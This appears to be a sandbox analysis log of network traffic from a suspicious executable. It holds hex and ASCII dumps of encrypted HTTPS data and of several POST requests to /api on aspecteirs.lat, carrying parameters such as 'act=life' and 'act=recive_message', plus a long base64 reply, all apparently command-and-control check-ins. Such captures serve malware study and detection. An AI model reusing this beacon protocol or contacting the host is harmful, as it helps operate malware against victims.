                                                                                                                                                                                                                                        2024-12-19 05:09:56 UTC1378INData Raw: 7f 3c fb cf 9b ee e5 f5 61 04 ec 17 45 da 7a 22 fb 89 b1 6e a8 3c 39 03 48 4f a6 38 c9 32 32 a0 f3 de db f8 ac f9 60 db 2c de a3 b3 61 f0 7f db 6b 32 72 05 34 1b 2e da 3b fe 0a b0 3c 31 bf 0a 3e 0c 9d 8f be a0 b8 2d 8b e3 17 00 96 b5 14 c6 0b 31 e5 33 f3 e2 f4 b8 62 fc eb 87 6b bf 83 6a ea 82 2f 67 5c a0 3f dc 66 9b 8b 69 3b 42 0d 62 b6 06 8c 74 8d dc 29 30 7a 57 67 e2 38 c1 23 00 6e 42 48 ca da bb f5 c7 01 f4 19 03 69 65 6d e5 b0 ea ec 8e f1 7e 27 fe 5c ec 10 5a 69 9d 5c b5 ed 55 10 9a 3c df c4 3d fa 6e 15 73 ba 43 75 e8 cd 0b 2f 23 f3 26 c1 81 f4 6a 6c 33 fd b4 fc 44 9e 68 cb 8b b7 8b 38 f0 26 cc 60 6b 6c 13 a0 48 72 54 63 ff d0 69 80 78 e0 0a d8 62 bb 4d 5d 85 36 3c 9e 83 4f 77 56 60 6d a4 18 2c 70 5e 18 63 5c 10 2b a2 6c 51 4c 48 dc 09 7a 55 4f f1 08
                                                                                                                                                                                                                                        Data Ascii: <aEz"n<9HO822`,ak2r4.;<1>-13bkj/g\?fi;Bbt)0zWg8#nBHiem~'\Zi\U<=nsCu/#&jl3Dh8&`klHrTcixbM]6<OwV`m,p^c\+lQLHzUO
                                                                                                                                                                                                                                        2024-12-19 05:09:56 UTC1378INData Raw: cd 3a 89 7c 61 f9 ad e9 47 47 81 23 fc 3a 2f b5 f0 4d 0b 8b 29 d0 2b 7f 92 b1 2f ff 4c 92 2e ac dd 43 f6 04 93 d5 ff 41 01 3b 9a b7 74 94 f0 2d f7 6f fe c9 1a 4a e2 72 10 49 be 79 64 1e 59 98 c5 73 c1 2a d2 fa ae 9a 87 53 c6 22 fe 8d 75 6a ab 48 e1 0b c7 82 2f 89 a7 52 6e 2e fb 11 41 32 56 e6 f7 04 a9 c2 7e a9 73 03 b5 5e 4c b5 79 b8 36 79 89 d0 e1 a9 f6 25 00 ee 74 88 51 73 0e b8 8a 09 dd bc 9f 34 a0 74 5a 0c 14 42 ca 33 44 ed b5 46 6e e8 2b e7 68 75 d2 d0 6a 06 80 61 d9 4c 48 d3 75 e6 7b ea 03 9c 56 b3 9a a2 fe 7e 5d c7 98 7c ba a6 70 30 fc 93 de 65 4c 0d 22 8d ae 53 69 de 64 a8 93 ee 6e 80 34 db 95 7f e2 f3 f8 6e b6 ca 18 0f 9b bd 92 b3 88 92 2f a1 09 99 e0 be 9a da 67 4a 12 e3 a6 80 3e bc 60 ae d1 a3 80 48 74 82 1e 7c 29 e8 86 3a 66 74 63 bf 32 84 b6
                                                                                                                                                                                                                                        Data Ascii: :|aGG#:/M)+/L.CA;t-oJrIydYs*S"ujH/Rn.A2V~s^Ly6y%tQs4tZB3DFn+hujaLHu{V~]|p0eL"Sidn4n/gJ>`Ht|):ftc2
                                                                                                                                                                                                                                        2024-12-19 05:09:56 UTC1378INData Raw: 2e 34 d2 36 c0 1c 87 05 5c 19 ce a7 bd 39 4e 7d 8b 06 42 78 48 49 6f d7 9e dc 3a 51 28 cf d3 b8 60 bb 66 7f 15 75 62 46 09 a7 b7 e2 4e f9 4c ce 36 6b 96 d8 1c 3d 12 ab 4f fa 4a 93 46 1d e0 e5 da 7b 7e ea 20 1a 24 16 a4 57 46 00 78 d6 d2 52 42 48 61 fb 11 84 e4 88 38 35 08 87 fe d7 21 d2 15 3b b1 d6 32 14 35 9b f5 24 fd 97 82 12 89 fb c8 42 80 ab c0 fe 57 3f b0 f7 05 cf c8 4c 9d 0d 28 61 a6 4a ff df 92 66 f3 77 e4 f4 ab b8 1a cc e3 84 f3 c5 e8 a6 23 97 5e 97 2e 49 f7 87 b2 1c e7 c3 6d 90 57 d5 93 b3 a0 57 ea 3b 13 7f a6 ac 57 86 84 70 7a 33 ee a4 49 61 6c c4 db 59 bf 8b 5d d3 90 df 70 fd 12 fb 6f ef 9c ec 2b 51 d9 e7 01 c0 d1 e4 bd b0 75 e7 7c 94 e3 8c 0f 18 6c 6a 23 dc 80 94 92 65 ab fb 9e 3e e6 dd 0f dc 18 39 0c 3b 45 ff 79 45 9c 77 a8 ef 64 09 40 9f a1
                                                                                                                                                                                                                                        Data Ascii: .46\9N}BxHIo:Q(`fubFNL6k=OJF{~ $WFxRBHa85!;25$BW?L(aJfw#^.ImWW;Wpz3IalY]po+Qu|lj#e>9;EyEwd@
                                                                                                                                                                                                                                        2024-12-19 05:09:56 UTC1378INData Raw: 6f 27 c8 2d a7 9d ad 5b 54 d5 1a 44 4a cf 01 57 bf fa c7 40 0f 62 46 a9 78 3b 53 2e c9 60 34 8b 54 3e c2 aa 4c 64 e8 0f 4d 01 52 ca 2e b9 4a 41 71 e9 1a 17 8b 36 85 2b 37 1c b2 47 c3 92 79 78 44 aa e4 73 45 c3 7a ec a7 e8 f7 97 f9 e5 71 06 ae 79 53 00 5a b4 d4 63 52 3c 66 0d 2b ba 47 e1 89 5a ea fe 50 67 3d 24 e0 25 c3 bf 2c 06 02 81 ba 53 b7 8c e7 69 41 5d 67 e5 27 5f ec 50 ae ad 59 7c 47 c4 d3 9c 51 f8 c1 d4 af f7 51 63 69 25 2f 55 56 a6 7f 1d 5e 56 09 83 c4 2a 95 b4 0c d0 59 9a b3 d2 54 43 c2 53 ce ca 88 f2 ab 02 49 f5 6a 13 ba 37 af 1a e5 a9 c6 63 09 86 3a e5 69 a5 da 02 b7 22 96 08 04 32 f5 0f b5 82 78 1a 6a f8 99 d4 fd 19 e7 d9 d9 7c a0 8f df f7 83 e0 1f 60 60 97 60 39 64 30 6a d4 64 cd b7 ed b6 a7 f9 39 b4 fe 6f c4 7e 33 ca a7 36 25 c0 31 bf 78 3c
                                                                                                                                                                                                                                        Data Ascii: o'-[TDJW@bFx;S.`4T>LdMR.JAq6+7GyxDsEzqySZcR<f+GZPg=$%,SiA]g'_PY|GQQci%/UV^V*YTCSIj7c:i"2xj|```9d0jd9o~36%1x<
                                                                                                                                                                                                                                        2024-12-19 05:09:56 UTC1378INData Raw: ba 49 69 e7 8f 7d d1 5f af da 49 9c 64 28 98 59 36 b3 a4 1d f8 cb 15 30 7b 25 96 6a 09 2c f9 20 89 72 a7 05 a6 ea 8d 9a 4d 6f 93 43 f8 1a 0b 86 c5 cd 49 b1 ae e6 66 89 2c 31 6d 66 65 ba b9 26 f7 bc e2 7e 04 08 8b 2a 14 e9 10 fd 4f e9 bc c6 a4 d3 a8 ff e7 d6 37 51 ca 11 be 2b c4 19 d5 58 47 e5 06 47 a6 80 1f cd 2c cd 1b 2f fe bf 7a e4 22 a8 58 99 b7 c2 f4 2a 61 f9 4b 1f 10 3a 80 ad c6 6c c2 ad 0a e8 42 64 3a 1d 96 d8 35 ce 0e d9 3d a7 34 55 40 23 4e ec 0a 67 8f e3 ae f1 06 2c 05 91 70 68 31 70 bc 85 3c c2 34 7e 0b 71 0b ef a9 16 2d 07 43 97 d6 3c d9 85 4d 50 fa be f0 ac b9 0b 8b 20 9b 22 09 1f cb 88 e8 11 b7 86 f0 e6 ed 30 8d 84 c5 b5 0c 33 84 45 94 ff 9e 5f 82 1d d6 2a c6 a7 07 43 f5 be f1 7d dc 32 9e 71 98 2a 5e aa e3 b3 e4 3c fe fd 1c ba 1b fe 1d c0 d9
                                                                                                                                                                                                                                        Data Ascii: Ii}_Id(Y60{%j, rMoCIf,1mfe&~*O7Q+XGG,/z"X*aK:lBd:5=4U@#Ng,ph1p<4~q-C<MP "03E_*C}2q*^<
                                                                                                                                                                                                                                        2024-12-19 05:09:56 UTC1378INData Raw: 52 e0 1f 58 23 09 4b ac 81 56 f8 11 a3 e9 9a 43 0c 60 01 1d ac 7a b7 e5 2b f8 87 42 a7 8f 08 53 15 76 f7 ad 7b 62 db 9b f9 e8 88 8f 97 0a 19 31 58 c4 e7 2b 34 56 b1 00 87 dc 42 8f cf 0b 67 f8 38 50 45 9a 20 8e fa c9 f1 85 14 bc 23 26 13 67 95 23 3c fc 05 7b 68 9c 69 8d 73 5b fc c0 db 6e da 60 44 01 ed 8b 92 68 d9 2c 74 c3 17 41 9d 40 7d e1 6f c6 35 d8 97 5d ee 57 5b 90 e9 51 03 2c 68 50 87 88 56 9d 16 a8 1b ac 3f 66 16 fd ff b9 0c 32 82 96 49 d1 4a 63 f5 a8 47 9b 08 b8 45 61 aa 63 64 be c9 9a f2 0b dd 64 ef 60 ad 54 73 91 db b5 0f 39 94 2a 4d b1 f6 81 20 51 06 ac df e4 cd 78 af 96 19 fe 1a c8 4a 65 e8 79 5d cc c5 8d d9 1d f9 22 55 8a 86 da 2b f0 00 1c 49 5f d3 1c 62 bf 22 c3 33 ec d2 ad d3 ab 98 d2 42 8b 64 a6 41 08 fd 7f a6 3c da c3 89 a7 2e 33 dc 08 02
                                                                                                                                                                                                                                        Data Ascii: RX#KVC`z+BSv{b1X+4VBg8PE #&g#<{his[n`Dh,tA@}o5]W[Q,hPV?f2IJcGEacdd`Ts9*M QxJey]"U+I_b"3BdA<.3


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        2192.168.2.449889104.21.66.854431464C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-19 05:10:00 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                        Host: aspecteirs.lat
                                                                                                                                                                                                                                        2024-12-19 05:10:00 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                                                        2024-12-19 05:10:01 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:10:01 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=vfgu34f4c8tun7f1pkeghaprip; expires=Sun, 13 Apr 2025 22:56:40 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=doPiq5hATVOpak22dqfeDfBwiaF9B0CSUtOoC%2FUvPV3ecTLq1w9tE7dMnQmu8NnXPItHeloyqvVitMQl8I%2BPkY%2BUIYUXQDzezNOVX89DLf%2B12a2%2BgpNfCa7XwuJjpQeFvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8f44e23f6a6b32f4-EWR
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1802&rtt_var=693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=905&delivery_rate=1620421&cwnd=112&unsent_bytes=0&cid=90b7e5b781dd02b5&ts=805&x=0"
                                                                                                                                                                                                                                        2024-12-19 05:10:01 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                                                        2024-12-19 05:10:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        3192.168.2.449896104.21.66.854431464C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-19 05:10:02 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 50
                                                                                                                                                                                                                                        Host: aspecteirs.lat
                                                                                                                                                                                                                                        2024-12-19 05:10:02 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 56 6d 72 30 74 2d 2d 69 6e 73 74 61 6c 6c 73 26 6a 3d
                                                                                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=CVmr0t--installs&j=
                                                                                                                                                                                                                                        2024-12-19 05:10:03 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:10:03 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=70irucgkto3jgj63ge4o74ttca; expires=Sun, 13 Apr 2025 22:56:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mGEVHCsAtHfJ43xbGmDhBxHgFZsclSbM7vCIKtjTmy%2F%2ByITHRVO2yntdAT%2BBO9yK%2B%2FGafewKmn9HX8Bh60d7lWLJz0bD2NxLzHf7SSYUzzA7RRJ0XPYEGT9ZOIOe2J0hXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8f44e24c2e5a0f79-EWR
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1697&rtt_var=690&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=948&delivery_rate=1526398&cwnd=241&unsent_bytes=0&cid=a5bed9bd47004be2&ts=807&x=0"
                                                                                                                                                                                                                                        2024-12-19 05:10:03 UTC240INData Raw: 63 35 30 0d 0a 47 4a 7a 64 58 76 52 42 61 64 36 66 54 6b 39 6b 66 4b 61 63 4c 42 4b 47 43 4b 6a 70 38 2b 46 30 37 72 4a 4f 6a 31 71 6e 2f 75 4e 6a 76 71 74 38 7a 6e 56 46 2f 4f 77 72 62 56 34 49 31 4f 6c 4a 50 71 52 70 7a 4d 76 4a 68 78 57 43 77 53 75 6a 65 4e 47 54 77 53 4c 36 76 44 4b 48 4a 45 58 38 2b 6a 5a 74 58 69 66 64 76 6b 6c 38 70 44 4b 4b 6a 4a 6d 44 46 59 4c 51 4c 2b 51 31 31 35 4b 41 63 50 43 36 4e 70 45 69 44 62 2f 7a 49 79 6f 42 47 63 66 32 51 6e 76 72 59 4d 58 4c 33 38 4d 52 6c 4a 42 30 72 52 66 43 69 6f 4a 56 2f 61 34 31 31 6a 78 46 70 62 30 72 49 55 5a 47 68 50 31 4a 63 4f 70 75 7a 49 4b 62 69 52 79 4b 30 53 72 6c 4b 73 36 59 69 33 44 2b 75 54 65 62 4b 78 6d 79 2b 53 51 68 42 78 50 48 76 67 41
                                                                                                                                                                                                                                        Data Ascii: c50GJzdXvRBad6fTk9kfKacLBKGCKjp8+F07rJOj1qn/uNjvqt8znVF/OwrbV4I1OlJPqRpzMvJhxWCwSujeNGTwSL6vDKHJEX8+jZtXifdvkl8pDKKjJmDFYLQL+Q115KAcPC6NpEiDb/zIyoBGcf2QnvrYMXL38MRlJB0rRfCioJV/a411jxFpb0rIUZGhP1JcOpuzIKbiRyK0SrlKs6Yi3D+uTebKxmy+SQhBxPHvgA
                                                                                                                                                                                                                                        2024-12-19 05:10:03 UTC1369INData Raw: 77 34 33 4b 4b 30 39 48 51 4a 49 2f 42 50 66 67 31 31 5a 72 42 5a 62 43 6d 66 4a 45 76 53 2b 53 39 4a 43 45 49 47 38 66 78 53 58 48 6b 65 4d 57 4c 6b 6f 73 65 69 4e 6f 6a 34 6a 66 4c 6c 6f 5a 79 39 37 67 7a 6b 53 73 4e 73 2f 35 73 59 30 59 5a 33 4c 34 57 4d 4d 52 36 79 59 69 46 6a 67 66 4d 7a 32 4c 30 65 4d 4b 51 77 53 4b 2b 75 54 4b 58 4c 67 75 75 39 53 63 6d 41 77 7a 50 39 30 4e 39 35 47 66 41 68 4a 4b 44 45 59 62 61 49 2b 63 38 79 4a 47 48 65 76 37 2f 63 74 59 6b 45 2f 79 6c 62 41 34 44 44 73 50 79 57 44 4c 65 4b 74 58 46 69 4d 4d 52 67 4a 42 30 72 54 44 41 6e 34 4a 78 38 62 77 30 6e 54 45 4c 72 76 73 68 4b 42 51 59 77 66 42 45 63 2f 5a 67 78 49 32 53 69 68 32 46 31 53 76 70 65 49 76 63 68 6d 4b 2b 35 33 79 33 4c 67 43 77 39 7a 73 74 52 67 47 4b 35 77
                                                                                                                                                                                                                                        Data Ascii: w43KK09HQJI/BPfg11ZrBZbCmfJEvS+S9JCEIG8fxSXHkeMWLkoseiNoj4jfLloZy97gzkSsNs/5sY0YZ3L4WMMR6yYiFjgfMz2L0eMKQwSK+uTKXLguu9ScmAwzP90N95GfAhJKDEYbaI+c8yJGHev7/ctYkE/ylbA4DDsPyWDLeKtXFiMMRgJB0rTDAn4Jx8bw0nTELrvshKBQYwfBEc/ZgxI2Sih2F1SvpeIvchmK+53y3LgCw9zstRgGK5w
                                                                                                                                                                                                                                        2024-12-19 05:10:03 UTC1369INData Raw: 77 49 32 65 6a 68 72 4d 6e 6d 7a 71 49 49 58 45 77 56 44 39 71 7a 2b 63 59 54 36 2f 38 79 49 71 45 46 37 62 73 46 63 77 34 32 61 4b 30 39 47 4f 46 34 54 57 50 75 49 31 78 70 4b 50 64 66 75 77 4e 4a 59 6a 42 72 6e 35 4a 79 59 46 45 38 44 73 52 48 44 73 62 38 75 42 6d 38 4e 59 7a 4e 63 30 72 57 43 46 72 5a 5a 78 76 49 6f 2f 6d 43 30 4d 71 72 30 7a 59 78 39 65 77 2f 49 4f 4b 4b 52 6e 77 6f 36 55 6a 42 65 47 33 69 6e 6e 4e 4d 32 53 67 6d 6a 78 75 7a 79 61 4b 77 47 78 38 79 67 6c 44 78 58 50 2b 45 35 78 37 69 71 45 79 35 61 62 56 74 53 51 47 4f 6f 30 79 4a 50 44 54 2f 32 78 4d 70 45 31 53 36 4f 7a 4e 57 30 42 45 6f 53 6d 44 6e 7a 74 61 73 47 42 6c 59 4d 52 67 64 55 76 36 6a 76 49 6d 34 74 30 2b 62 73 77 6e 79 34 4e 76 50 6f 6f 4b 42 51 62 7a 66 4a 43 4d 4b 6f
                                                                                                                                                                                                                                        Data Ascii: wI2ejhrMnmzqIIXEwVD9qz+cYT6/8yIqEF7bsFcw42aK09GOF4TWPuI1xpKPdfuwNJYjBrn5JyYFE8DsRHDsb8uBm8NYzNc0rWCFrZZxvIo/mC0Mqr0zYx9ew/IOKKRnwo6UjBeG3innNM2SgmjxuzyaKwGx8yglDxXP+E5x7iqEy5abVtSQGOo0yJPDT/2xMpE1S6OzNW0BEoSmDnztasGBlYMRgdUv6jvIm4t0+bswny4NvPooKBQbzfJCMKo
                                                                                                                                                                                                                                        2024-12-19 05:10:03 UTC181INData Raw: 73 30 50 7a 4e 63 67 72 57 43 46 6c 59 68 6f 38 4c 45 31 6d 79 55 44 75 2f 4d 68 4a 67 41 56 77 2f 6c 49 66 65 78 6e 7a 34 69 51 68 78 79 65 30 79 66 6e 4e 63 2f 63 7a 7a 72 35 70 33 7a 4f 59 79 79 77 31 44 77 32 46 41 69 45 34 51 42 70 70 47 33 47 79 38 6e 44 46 59 50 5a 49 2b 55 77 79 70 4f 46 64 50 69 35 4d 5a 4d 73 41 61 37 31 49 69 41 4e 45 63 2f 73 54 6e 33 67 5a 73 36 44 6d 6f 6c 57 77 70 41 72 39 58 69 64 33 4c 52 33 38 62 38 2f 67 47 4d 55 38 75 52 73 4b 67 70 65 6e 4c 35 43 66 75 52 6c 78 6f 65 61 69 78 65 41 33 69 76 6f 0d 0a
                                                                                                                                                                                                                                        Data Ascii: s0PzNcgrWCFlYho8LE1myUDu/MhJgAVw/lIfexnz4iQhxye0yfnNc/czzr5p3zOYyyw1Dw2FAiE4QBppG3Gy8nDFYPZI+UwypOFdPi5MZMsAa71IiANEc/sTn3gZs6DmolWwpAr9Xid3LR38b8/gGMU8uRsKgpenL5CfuRlxoeaixeA3ivo
                                                                                                                                                                                                                                        2024-12-19 05:10:03 UTC1369INData Raw: 33 63 63 63 0d 0a 4d 63 32 55 6b 33 76 36 74 7a 32 59 4c 41 71 34 2b 43 6b 70 41 52 72 43 38 51 34 2b 70 47 33 53 79 38 6e 44 4f 61 76 6c 62 73 77 43 68 59 50 50 59 37 36 34 4d 4e 5a 37 53 37 44 2b 49 43 55 4a 47 4d 33 79 52 48 6e 76 5a 73 47 50 6e 59 6f 54 69 74 45 70 36 44 6e 42 6b 49 74 38 2f 62 77 7a 6d 53 77 44 2f 4c 4e 73 4b 68 35 65 6e 4c 35 72 5a 2b 39 6b 7a 4d 75 4f 7a 51 2f 4d 31 79 43 74 59 49 57 51 69 48 7a 34 75 6a 43 58 4a 51 4f 35 39 53 67 73 41 42 6a 48 38 55 70 31 35 57 58 4f 68 35 2b 4a 46 34 33 63 4a 2b 49 7a 77 4e 7a 50 4f 76 6d 6e 66 4d 35 6a 4f 72 2f 72 4f 7a 30 4b 58 74 75 77 56 7a 44 6a 5a 6f 72 54 30 59 49 45 68 74 6f 69 36 44 66 41 6e 34 35 39 38 37 6b 77 6e 43 6f 44 75 76 49 6c 50 77 55 53 79 76 6c 41 66 4f 70 6e 77 49 69 63 77
                                                                                                                                                                                                                                        Data Ascii: 3cccMc2Uk3v6tz2YLAq4+CkpARrC8Q4+pG3Sy8nDOavlbswChYPPY764MNZ7S7D+ICUJGM3yRHnvZsGPnYoTitEp6DnBkIt8/bwzmSwD/LNsKh5enL5rZ+9kzMuOzQ/M1yCtYIWQiHz4ujCXJQO59SgsABjH8Up15WXOh5+JF43cJ+IzwNzPOvmnfM5jOr/rOz0KXtuwVzDjZorT0YIEhtoi6DfAn45987kwnCoDuvIlPwUSyvlAfOpnwIicw
                                                                                                                                                                                                                                        2024-12-19 05:10:03 UTC1369INData Raw: 6d 36 6a 2f 4f 6c 49 70 31 2b 4b 30 77 6d 44 45 4f 72 75 39 73 59 30 59 5a 33 4c 34 57 4d 4e 4a 74 32 70 75 53 77 53 65 61 30 7a 72 6d 4e 63 6e 63 6e 6a 54 6e 2f 7a 75 61 59 31 50 38 2b 79 4d 6b 42 52 48 46 39 30 4a 39 34 57 50 50 69 70 65 48 48 49 62 51 4b 75 73 35 77 4a 61 43 65 2f 53 32 4f 35 34 6b 43 4b 36 39 59 6d 30 42 42 6f 53 6d 44 6c 6e 6a 65 4d 53 62 30 5a 78 59 6c 5a 41 72 34 58 69 64 33 49 56 77 38 62 73 37 6d 69 55 4f 75 76 41 74 49 67 63 65 79 2f 70 46 65 65 4a 72 78 34 36 63 68 77 53 47 32 79 50 68 4d 63 6d 52 77 54 53 2b 75 43 54 57 65 30 75 4e 38 43 49 6a 41 51 69 45 34 51 42 70 70 47 33 47 79 38 6e 44 46 34 44 66 4c 2b 49 37 78 70 32 4c 61 4f 79 7a 4e 5a 34 6d 42 37 66 7a 4b 6a 38 41 45 63 33 39 54 58 6e 6a 59 73 61 42 6b 6f 52 57 77 70
                                                                                                                                                                                                                                        Data Ascii: m6j/OlIp1+K0wmDEOru9sY0YZ3L4WMNJt2puSwSea0zrmNcncnjTn/zuaY1P8+yMkBRHF90J94WPPipeHHIbQKus5wJaCe/S2O54kCK69Ym0BBoSmDlnjeMSb0ZxYlZAr4Xid3IVw8bs7miUOuvAtIgcey/pFeeJrx46chwSG2yPhMcmRwTS+uCTWe0uN8CIjAQiE4QBppG3Gy8nDF4DfL+I7xp2LaOyzNZ4mB7fzKj8AEc39TXnjYsaBkoRWwp
                                                                                                                                                                                                                                        2024-12-19 05:10:03 UTC1369INData Raw: 30 70 75 65 4e 4f 66 2f 4f 35 70 6a 55 2f 7a 37 4a 53 73 42 47 4d 72 73 53 33 62 72 5a 63 4f 43 6c 59 73 56 6a 4e 51 6f 36 6a 33 47 6b 49 70 39 2f 62 41 34 6e 79 30 43 73 37 31 69 62 51 45 47 68 4b 59 4f 55 66 39 70 78 6f 62 52 6e 46 69 56 6b 43 76 68 65 4a 33 63 6a 58 54 37 76 7a 61 51 4a 77 36 36 39 79 6b 74 44 52 33 4c 2b 6b 68 30 36 32 72 42 67 70 43 46 45 34 62 62 4b 75 41 37 77 35 72 42 4e 4c 36 34 4a 4e 5a 37 53 35 7a 6d 49 53 45 42 58 74 75 77 56 7a 44 6a 5a 6f 72 54 30 59 67 61 69 4e 63 73 34 44 76 4e 6d 59 56 77 2b 37 38 30 68 43 73 4c 75 2b 38 2b 4c 51 38 62 79 50 31 4f 64 4f 4a 6a 7a 49 69 56 77 31 6a 4d 31 7a 53 74 59 49 57 78 6a 58 33 58 75 43 66 57 50 45 57 6c 76 53 73 68 52 6b 61 45 2f 30 56 36 36 32 66 4a 6a 5a 4b 49 45 34 62 52 4b 2b 55
                                                                                                                                                                                                                                        Data Ascii: 0pueNOf/O5pjU/z7JSsBGMrsS3brZcOClYsVjNQo6j3GkIp9/bA4ny0Cs71ibQEGhKYOUf9pxobRnFiVkCvheJ3cjXT7vzaQJw669yktDR3L+kh062rBgpCFE4bbKuA7w5rBNL64JNZ7S5zmISEBXtuwVzDjZorT0YgaiNcs4DvNmYVw+780hCsLu+8+LQ8byP1OdOJjzIiVw1jM1zStYIWxjX3XuCfWPEWlvSshRkaE/0V662fJjZKIE4bRK+U
                                                                                                                                                                                                                                        2024-12-19 05:10:03 UTC1369INData Raw: 53 69 77 2f 79 37 57 65 30 76 37 2f 6a 34 2f 41 42 33 53 2f 51 6c 4f 32 6b 33 63 67 5a 61 54 45 5a 76 66 62 4b 4e 34 79 74 7a 5a 51 37 36 32 4f 34 30 79 48 62 48 74 4b 32 30 35 55 49 54 6d 44 69 69 6b 58 38 6d 46 6e 34 51 41 6e 5a 30 4c 2b 7a 4c 43 6a 49 5a 74 38 66 39 79 31 69 56 4c 35 4b 35 69 62 51 49 50 68 4b 59 65 49 72 38 2f 6d 64 7a 42 30 51 6e 43 79 57 7a 37 65 4a 33 4f 7a 7a 72 73 2f 32 54 57 5a 41 69 75 37 79 6f 75 45 42 32 44 77 48 42 58 2f 6d 66 4d 6e 49 43 39 4b 49 76 4b 49 65 73 76 31 4e 43 55 65 66 43 78 4f 34 42 6a 52 66 7a 79 62 48 55 2f 58 6f 79 2b 63 54 36 6b 63 6f 72 54 30 62 59 56 67 74 34 72 2b 79 6d 49 75 35 74 33 2b 4b 67 74 31 6d 31 4c 75 72 31 30 66 55 68 65 77 4f 38 4f 4b 4c 51 34 6b 64 37 43 31 45 62 65 7a 32 4c 30 65 4e 50 63
                                                                                                                                                                                                                                        Data Ascii: Siw/y7We0v7/j4/AB3S/QlO2k3cgZaTEZvfbKN4ytzZQ762O40yHbHtK205UITmDiikX8mFn4QAnZ0L+zLCjIZt8f9y1iVL5K5ibQIPhKYeIr8/mdzB0QnCyWz7eJ3Ozzrs/2TWZAiu7youEB2DwHBX/mfMnIC9KIvKIesv1NCUefCxO4BjRfzybHU/Xoy+cT6kcorT0bYVgt4r+ymIu5t3+Kgt1m1Lur10fUhewO8OKLQ4kd7C1Ebez2L0eNPc
